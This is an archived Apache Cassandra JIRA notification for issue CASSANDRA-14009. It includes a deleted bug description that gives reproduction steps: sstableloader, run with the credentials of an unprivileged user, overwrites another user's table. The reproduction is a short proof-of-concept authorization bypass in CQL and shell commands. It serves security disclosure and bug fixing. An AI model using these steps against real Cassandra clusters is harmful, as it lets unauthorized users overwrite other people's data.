You are viewing a plain text version of this content. The canonical link for it is here.

Posted to commits@cassandra.apache.org by "Andrzej Bober (JIRA)" <ji...@apache.org> on 2017/11/13 14:07:00 UTC

[jira] [Updated] (CASSANDRA-14009) Any user can overwrite any table with sstableloader

     [ https://issues.apache.org/jira/browse/CASSANDRA-14009?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Andrzej Bober updated CASSANDRA-14009:
--------------------------------------
    Description: __deleted__  (was: Hi there,

Looks like any user can overwrite any table with sstableloader.
Tested ubuntu 16.04.3, Java 1.8.0_151_b12, and Cassandra 2.1.19 / 2.2.11 / 3.0.15 / 3.11.1.

{code:sql}
cassandra@cqlsh> CREATE USER alice WITH PASSWORD 'Alice';
cassandra@cqlsh> CREATE USER bob WITH PASSWORD 'Bob';

cassandra@cqlsh>  CREATE KEYSPACE db4alice WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};
cassandra@cqlsh>  GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;

alice@cqlsh> CREATE TABLE users (userid text PRIMARY KEY, password text);

alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user1', 'pass1');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user2’, 'pass2’);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user3’, 'pass3’);

alice@cqlsh> truncate users;

alice@cqlsh> select * from db4alice.users ;
 userid | password
--------+----------
(0 rows)

sstableloader -d 127.0.0.1 -u bob -pw Bob ./db4alice/users

alice@cqlsh> select * from db4alice.users ;

 userid | password
--------+----------
  user2 |    pass2
  user1 |    pass1
  user3 |    pass3

(3 rows)
{code}

Looks like a pretty serious bug to me.)

> Any user can overwrite any table with sstableloader
> ---------------------------------------------------
>
>                 Key: CASSANDRA-14009
>                 URL: https://issues.apache.org/jira/browse/CASSANDRA-14009
>             Project: Cassandra
>          Issue Type: Bug
>          Components: Auth
>            Reporter: Andrzej Bober
>              Labels: security
>             Fix For: 2.1.x, 2.2.x, 3.0.x, 3.11.x
>
>
> __deleted__



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@cassandra.apache.org
For additional commands, e-mail: commits-help@cassandra.apache.org